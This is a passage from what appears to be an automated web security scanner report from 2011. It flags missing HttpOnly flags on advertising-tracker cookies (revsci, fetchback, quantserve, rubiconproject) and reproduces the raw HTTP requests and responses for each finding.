Set-Cookie: rsi_segs_1000000=pUPFJk+B73IM1p94u+w/laQbf6+lz8ELNM5Vc4Rolc9aqYeSA7Ot9uNg2v9oDss6IqtPYudgLL+SIwarfPSfqUd5S4nO0iB2YlcZM/NMKin8fzqXUamHmGKHVc2IEzLyrhYncD3GdTNVMyvdJNWE5nOWDuvFhOUx9n71gsbgsmhMaehsXdR6+g/Kfcw2pxWTukDEga+j9sjwJH8to7xh8MHe1GQjVL0IEbfOQ7K7V9esWjRyMtXUptHBm7ELw3uiP2Ib9HldaGmxnOtfaaeP3E5QjYhzUvL5voTDickiwMFjO+oDZcksc40u8xpmKZES28Zoueo8jJJz7Q4xhFz/I7/Q; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:36:32 GMT; Path=/
Set-Cookie: NETSEGS_I09837=e98f30f2b8e2390e&I09837&0&4e99b690&0&&4e73fbc8&239be0b9fdae6d2fbd805afcd850cfc7; Domain=.revsci.net; Expires=Sat, 15-Oct-2011 16:36:32 GMT; Path=/
X-Proc-ms: 8
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:36:31 GMT
Content-Length: 673

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]
...[SNIP]...
13.143. http://pix04.revsci.net/I09839/b3/0/3/1008211/194305936.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I09839/b3/0/3/1008211/194305936.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I09839/b3/0/3/1008211/194305936.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252F%253FBeauty%252520Book%252520Status%253DFalse%2526_rsiL%253D0%26DM_CAT%3DQuick%2520%2526%2520Simple%26DM_REF%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fmetrix4media.php%26DM_EOM%3D1&C=I09839 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Set-Cookie: rtc_z0DM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IGDA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pfus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BRdV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jYH_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fzlq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-mxv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mHcA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HXmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pKCG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Klrm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU6Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_s926=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b9i7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rXeX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XwpC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2N5M=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_X46z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gR4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tnvC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HxEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1zQw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pe6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oybS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__3n9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ix0F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D5V5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gHAY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6BxH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KKED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_nSm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_458L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FYNR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b81E=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D3Fl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AAAA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uDaq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kbwA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xA_8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CJm7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_En3x=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fL1F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bXp4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w6Dv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dhzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GwOc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a-37=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ux5A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wENX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mFWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CY0g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oP87=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_izKJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1vJj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mBmG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xguM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5ff3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5UrE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ptS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6ZIi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiTd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zcl2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_G-1g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DiFj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xNIB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000="pUPFJkmBrwIMl594t637EICbRK4QHREL5G4UoYRo7896qYeIB48s9uNg2v9kDss6IrPb32QuZAA+ogTcdvc12uWS8zNU8vksvYtAU6UZuHGGPjPpQ5MxVpjgP4vuejYFNo+S4+m7EU6TTwk/FEx2QagOfpJdbr04CGJT9Mizt+HrTvOtdCT3iuMefdv+k4tpy5gEw9+l5r6kQvcj+w6WIN94r10iwKRwRhsa0gjyxXSSUoJHkrUJB/DBJczm+OyAKiHoCB70hpWXvczT318bIecd5dKeVoJqNjzuqhw6skMLwgzQvVU/MVmBY/W0dAprmjy0RTJw4oPZ50gPFdDP+xQ="; Version=1; Domain=.revsci.net; Max-Age=31536000; Expires=Sun, 16-Sep-2012 16:37:01 GMT; Path=/
Set-Cookie: rtc_pDET=MLvv9aEOYT5j57i/ixrq7ESAVntFgjI29t2xBQPh8HXbytI0rbuQdocrtHLkYVKR4WqGSuPieDgcgFLc74AMPt+1vU1g7402fvmpdSBnI0/yhPLtCSGcwVKsuQ3T2X146Y2s4Y5VX/x4D/7u9IhCoUrrvgflVwvlKjw4ErzlQDE2q/Ys6J+/Nvxdh2Hfplu+oQ7F3SKOiIuWw/4/4cLZlA4JMAgdGjtY5rmilMjYZElz3CBIzIOFGK1l0a3DkpdBtl80hKfrpadLhZ66B2OlJYJBgLh46PEwq+gsXJzzBsp9JzQNyrqVbvffpQgHwZVhWckg2IOG0p8dcrULMzkVAYVsbaHvdOGD1ewlQXWDhlwy6hiv8kvTHJ3eUx+QeJIwsZ5K8Mp8KM3tCMpALtayzRf+LxNkZV6SRZGUMwhgOHIg4mjAgUxsTUfAK+tr4eCSYsBTJZ5sLrCKXZicAuTnNYyczR1jWkoJwQZTk9xYHzm7uhmkN4mDpJdPKFlli+SOVwdBwQCNmc02963jqlITuJ5tFaqCmTlgCIfwGauBvyq7QNr30AIijXBdII8sERacop33KBpaV6T569sGdzHlP9KElZxl7/8JDDxH6mtitDXRMX7ogbEwY6SV49zQqFoMNecrEiakLknKFHCT6kgsnR5F7cAeMGFHkHoFCFFiYsWW2Ud640WKbAZLX1HsGqRGBgfXKQPJYQbeOoseUNLoSw==; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:37:01 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:37:00 GMT
Content-Length: 731

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs=['I09839_10001','D08734_72674'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.re
...[SNIP]...
13.144. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/optout?nocache=0.6576139 HTTP/1.1
Host: pixel.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1315321216_1313187598706:3996835167182453; kwd=1_1315321216; sit=1_1313187598_11:0:0; cre=1_1315321216_20053:11792:1:0:0_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; bpd=1_1313187598; apd=1_1313187598; scg=1_1315321216; ppd=1_1315321216; afl=1_1313187598; act=1_1315321216; eng=1_1313670599_20056:0

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:18:36 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: apd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cmp=1_1316279916_20:3092318; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1316279916_20053:11792:1:958700:958700_20056:11790:1:2609453:2609453_20054:11791:1:2855127:2855127; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uat=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1316279916_11:3092318:3092318; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1316279916_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: opt=; Domain=.fetchback.com; Expires=Thu, 15-Sep-2016 17:18:36 GMT; Path=/
Set-Cookie: ppd=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1316279916_20056:2609317; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1316279916; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 17:18:36 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://pixel.fetchback.com/serve/fb/optoutverification
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 0

13.145. http://pixel.quantserve.com/optout_set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_set?s=nai&nocache=0.7603821 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:35 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=0.7603821
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 17:19:35 GMT
Server: QS

13.146. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=260246413;fpan=1;fpa=P0-1368744640-1316295502134;ns=0;url=http%3A%2F%2Fwww.local.com%2F;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=title.Local%252Ecom%20-%20Search%20for%20local%20businesses%252C%20events%252C%20and%20coupons%20near%20you%2Curl.http%3A%2F%2Fwww%252Elocal%252Ecom%2F%3Flocation%3DDallas%252c%2BTX%2Ctype.%2Cdescription.Find%20local%20listings%20of%20businesses%20and%20services%20near%20you%252E%20Get%20driving%20directions%252C;dst=1;et=1316295502133;tzo=300;a=p-7dRSNJjMQXwDI HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EHQBIgHdB4HyBprRW9iB4QochAHS

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/8171//99D2/
Set-Cookie: d=EKUBIQHdB4HyBprRW9iB4QochAEA; expires=Fri, 16-Dec-2011 16:37:09 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 17 Sep 2011 16:37:09 GMT
Server: QS

13.147. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=439524AE8C6B634E021F5F7802166020&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; put_2132=439524AE8C6B634E021F5F7802166020; ruid=154e62c97432177b6a4bcd01^6^1315959802^840399722; csi15=3165738.js^1^1315959802^1315959802; csi2=3167262.js^1^1315960045^1315960045; put_1185=2944787775510337379; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C240%2C8%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C%266643%3D14894%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266643%3D1%264212%3D1%266432%3D1%266286%3D1; expires=Mon, 17-Oct-2011 16:31:39 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C240%2C8%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C141%2C3%2C%2C%266643%3D14894%2C0%2C1%2C%2C; expires=Mon, 17-Oct-2011 16:31:39 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=439524AE8C6B634E021F5F7802166020; expires=Sun, 16-Sep-2012 16:31:39 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
13.148. http://privacy.revsci.net/optout/optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optout.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout/optout.aspx?a=1&p=http://www.networkadvertising.org&nocache=0.3478553 HTTP/1.1
Host: privacy.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: NETID01=f9891e48fd6ce58119cd075cc3adf5a4; NETSEGS_K05540=e98f30f2b8e2390e&K05540&0&4e91904a&0&&4e6c320d&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_H07707=e98f30f2b8e2390e&H07707&0&4e8312a8&4&10921,10926,11001,11087&4e5db56e&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_J08778=e98f30f2b8e2390e&J08778&0&4e8636da&0&&4e604379&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_I09839=e98f30f2b8e2390e&I09839&0&4e999932&0&&4e740fed&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_F10931=e98f30f2b8e2390e&F10931&0&4e99b65c&0&&4e73f9df&239be0b9fdae6d2fbd805afcd850cfc7; udm_0=MLv39CEJZjpv597JCM1YKC+qfowJLkXm5HzcyJTaomayNeTIOt0mZGCnnxCU3g5Fl7++17leNm8ffHAB6b/mVCtcPC0+5TNgOqGlLOcs7kcw6WMqaKWl2kIvQZjEsolL0pz4vf6LEszPlgna/4OBy5/4ZkTTspiv9Msm6hzYCWbeP2g+R5/58eVFI8tRMfSjfnQLqH0/pEMmXXwmwuU8xD+kpzoEsTO7ez5HPy5K+mbh4LfHaMsWCL+XCTKWI9cdmIHl+gVPDTgc3CK8pLaz/7jrNk0pxHNOuHrk4FVkIDy9k2EMXKHSpygrcSIf7V0cXWR0V/SY2w0OzR5WIy7wVWesqdD0kNEUpdOZDrMhImy9MetxZAY/dYUYac7pgETe1YmNjk3G1SVS5XidmU7it/alnDLr7a6rBDiERDC0Lwmk0X2/WdHopasjBk9zXTQ5vymOk6PP8fTs+kGg8y9zoCfQjEhJI59YlVgsN2RbWcLxJ2ltXPcKVi6nKjKJgsfoZVrO2oHGAsWHqCrRziso12dwImO0oREKvquBMv8eypqMG2flmwPHuOnQavYplsHHbLFAK5PxjJhvGwP6B5fMyC68hk3aZMv2Ulug8AJdqWwTKCHtI0K9vgNTLcuQSLIa0T5yNdb6h1hyeG9btd9iyQMBQ4qsMf5kv67ybYgZgigDt5iY/OiCnqWhPexftsafKgOtBMBHwSMUMJQ/2tbGafyiMt6zPL3Xz5/btLPnBQG9mxDc6ZK2l9Oy3v37eFnWjY/J3ov/3q1tBXFezOPwGquiA8AUqL7LrKghR+Rvb8j/LAEShkTECSaC+LWwnz6ocbagwIqFFnAKWAEdy5DE6GhRR4elWwss77kfDtrC2Ends9TFrD/LjKNmZnicyRiU4xlFhQDgppNnnirTaZwTFK60mrg3th0XTTpTOCw+yPFKxeD4FVhNz0FcHh6yuWmKUTkbwk318gZQDfBORxTABzOBilvBEyiOCylwV